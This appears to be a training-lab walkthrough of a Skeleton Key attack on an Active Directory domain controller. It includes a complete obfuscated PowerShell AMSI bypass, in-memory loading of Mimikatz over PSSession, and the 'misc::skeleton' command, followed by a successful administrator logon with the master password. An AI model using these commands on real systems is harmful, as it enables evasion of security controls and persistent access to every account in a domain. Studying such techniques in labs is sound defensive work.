Obj 10 Skeleton Key

Task - Use Domain Admin privileges obtained earlier to execute the Skeleton Key attack.

Use this attack with caution! It has the potential to break the DC!

We can simply use the following mimikatz command to execute the attack. Note that the command needs to be run with Domain Admin privileges. We could also use SafetyKatz or any other tool for the attack. First we need to bypass AMSI and load mimikatz in memory on the DC:

Create a new PSSession to the DC

PS C:\AD\Tools\Tools> $sess = New-PSSession dcorp-dc.dollarcorp.moneycorp.local

Enter the session

PS C:\AD\Tools\Tools> Enter-PSSession -Session $sess

Run the AMSI script

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

From our local machine we can load mimikatz into memory on the DC

Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess

Now we can enter back into the session and run the attack

PS C:\AD\Tools\Tools> Enter-PSSession -Session $sess

Skeleton Key Attack

Invoke-Mimikatz -Command '"privilege::debug""misc::skeleton"'

Now we can log on to any machine as any user unless the DC is restarted

Use mimikatz as the password

PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Credential dcorp\administrator
[dcorp-dc]: PS C:\Users\Administrator\Documents> whoami
dcorp-dc\administrator
[dcorp-dc]: PS C:\Users\Administrator\Documents> exit